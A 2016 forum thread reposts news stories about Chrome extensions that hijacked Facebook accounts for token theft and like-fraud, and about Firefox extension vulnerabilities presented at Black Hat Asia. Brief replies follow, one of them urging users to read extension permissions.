Chrome Browser Extensions Discovered Engaging in Facebook Click Fraud

Discussion in 'BlackHat Lounge' started by The Scarlet Pimp, Jul 22, 2016.

  1. The Scarlet Pimp

    The Scarlet Pimp Senior Member

    Apr 2, 2008
    Likes Received:
    Chair moistener.
    Google has removed a group of malicious browser extensions from its Chrome Web Store, after an independent Danish security researcher discovered that the programs were hijacking users' Facebook accounts for click fraud purposes, using them to "like" links to sketchy webpages.

    Maxime Kjaer, a 19-year-old computer science student, reported on his Output blog site that he uncovered the scheme after clicking one of several trashy links on Facebook that a friend of his supposedly liked.

    The link brought him to an adult-oriented content site requiring an age verification process that could only be completed, strangely enough, by first installing a Chrome extension that asks permission to "read and change all your data on the web sites you visit."

    Needless to say, this is a rather excessive request.

    The suspicious extension allegedly came from the viral content site, and was available in the Chrome store, along with nine other identical programs that collectively amassed over 132,000 users.

    After analyzing the extension's metadata, Kjaer determined that the age verification pop-up screen was entirely nonfunctional, merely serving as a decoy that concealed the true motives for obtaining such sweeping user permissions.

    However, another script within the code was more enlightening: this script was coded to download a payload from an external server and execute it.

    The payload, naturally, was malicious, designed to send links that direct users to a web page containing Facebook tokens, which the extension program can then grab and exfiltrate to the command-and-control server.

    Cybercriminals can potentially use these access tokens to hijack victims' accounts and use them to read and post messages, statuses and links – though it is unclear at this time exactly what the perpetrators did with the stolen tokens.

    Additionally, the malware instructs the extension to use victims' accounts as bots to generate false likes in Facebook-based click fraud campaigns. The malware's code also contained a function designed to subscribe victims to YouTube channels.

    And so, as Kjaer suspected, his friend did not really like those sketchy links. "As soon as I found out about the extension, I told him to uninstall it, log out and then log in again to his Facebook account to gain new access tokens," said Kjaer, in an email interview with

    "My friend told me that I was the first to notice it. He immediately unliked everything that the malware had liked for him, and I definitely think that he was glad to have it gone."

    Underhanded as this sounds, the creators of this malicious extension may have had even more nefarious plans in mind. Though no such activity appears to have taken place, Kjaer noted in his blog that the malware ultimately could have allowed its operators to read emails, steal additional credentials, obtain credit card information, launch distributed denial of service (DDoS) attacks, and more.

    "What I find scary is the fact that it is set up to auto-update regularly. Clearly the malware operators wanted it to be able to evolve," said Kjaer, who currently studies at the Swiss Federal Institute of Technology.


    Black Hat Asia: Researchers find reusable vulnerabilities in popular Firefox extensions

    Flaws affecting popular Firefox extensions were disclosed by researchers at Black Hat Asia in Singapore. The reusable vulnerabilities were discovered by Northeastern Univeristy PhD candidate Ahmet Buyukkayhan and assistant professor William Robertson.

    The attacks use functionality from non-malicious extensions to bypass Mozilla's security checks and use elevated privileges of extensions to access browsing history, passwords, and user information.

    The team researched 2,000 Firefox extensions and found several Firefox extensions, including NoScript, Video DownloadHelper, and GreaseMonkey are affected.

    One of the extensions, NoScript, is a favorite extension commonly used to prevent malware infection by limiting code execution. These extensions have each been downloaded by millions of users.

    Robertson is a co-director of Systems Security Lab at Northeastern University and a consultant at Lastline Labs.

    There is no readily available patch for the extension vulnerabilities. It is suggested that users uninstall the extensions. Mozilla did not reply to requests for comment by press time.

    UPDATE: Mozilla replied to an earlier request for comment with the following statement from Nick Nguyen, VP of Product for Firefox:

    "The way add-ons are implemented in Firefox today allows for the scenario hypothesized and presented at Black Hat Asia. The method described relies on a popular add-on that is vulnerable to be installed, and then for the add-on that takes advantage of that vulnerability to also be installed.

    "Because risks such as this one exist, we are evolving both our core product and our extensions platform to build in greater security. The new set of browser extension APIs that make up WebExtensions, which are available in Firefox today, are inherently more secure than traditional add-ons, and are not vulnerable to the particular attack outlined in the presentation at Black Hat Asia.

    As part of our electrolysis initiative - our project to introduce multi-process architecture to Firefox later this year - we will start to sandbox Firefox extensions so that they cannot share code."
    • Thanks Thanks x 2
  2. Sherb

    Sherb Jr. Executive VIP Jr. VIP

    Dec 26, 2010
    Likes Received:
    Perpetual Polymath
    Florida, USA
    Home Page:
  3. Neon

    Neon Jr. VIP Jr. VIP

    Nov 3, 2013
    Likes Received:
    Traveling the world
    Too long I don't have time to read it, because I'm busy ! What else to write in my diary hmm today I went to the doctor and everything went fine, bought 16 beers, received my sim cards, printed 2 documents and now I'm going to eat pizza. That's all dear diary, bye.
  4. Reaver

    Reaver Jr. VIP Jr. VIP

    Aug 6, 2015
    Likes Received:
    Unlike the very lazy pup above me, I actually read your post.

    I always read the permissions of something before I agree to download it. There are reasonable extension requests, and then there's "Let me read everything you're doing and modify it whenever I feel like it."

    It amazes me that people just blindly click "OK" on these things. If you just took two seconds to read what they were asking you, and used common sense, you could save yourself a whole lot of trouble.
    • Thanks Thanks x 1